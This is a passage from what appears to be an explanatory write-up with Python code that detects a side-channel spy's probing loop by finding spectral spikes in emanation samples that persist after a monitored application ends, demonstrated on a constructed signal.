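        im = sum(x * math.sin(2 * math.pi * k * i / n) for i, x in enumerate(window))
        mags.append(2.0 * math.hypot(re, im) / n)
    return mags


def spike_frequencies(window, min_amp):
    """Frequencies whose amplitude exceeds min_amp: the spectral 'spikes'
    that Spectral Profiling attributes to loops."""
    n = len(window)
    return {k * FS / n for k, m in enumerate(amplitude_spectrum(window))
            if k > 0 and m >= min_amp}


def loop_spikes_by_phase(samples, window_len, app_end_s, min_amp=0.3):
    """Slice the capture into windows and collect the spike frequencies seen
    while the monitored application runs and after it has ended."""
    during, after = set(), set()
    for start in range(0, len(samples) - window_len + 1, window_len):
        freqs = spike_frequencies(samples[start:start + window_len], min_amp)
        if start / FS >= app_end_s:
            after |= freqs
        else:
            during |= freqs
    return sorted(during), sorted(after)


def suspicious_spikes(samples, window_len, app_end_s, min_amp=0.3):
    """Loop activity that continues after the profiled application has
    finished cannot be the application's own; in the paper that persistent
    activity came from the spy's continuous probing loop."""
    _, after = loop_spikes_by_phase(samples, window_len, app_end_s, min_amp)
    return after


def demo():
    # Constructed scenario: the application's loop runs at 50 Hz for the
    # first 0.4 s; a probing loop at 125 Hz runs for the whole 0.8 s capture.
    samples = constructed_emanation(0.8, [(50.0, 1.0, 0.0, 0.4),
                                          (125.0, 0.6, 0.0, 0.8)])
    during, after = loop_spikes_by_phase(samples, 200, 0.4)
    return during, after, suspicious_spikes(samples, 200, 0.4)


if __name__ == "__main__":
    print(demo())
```

With 200-sample windows the frequency resolution is 5 Hz, so both invented loops land on exact bins and show up as clean spikes; the first two windows contain 50 Hz and 125 Hz, the last two only 125 Hz, and that leftover 125 Hz line is what the rule flags. A real deployment would replace the fixed amplitude threshold with the per-loop spike signatures learned during the training runs that Section I.D describes.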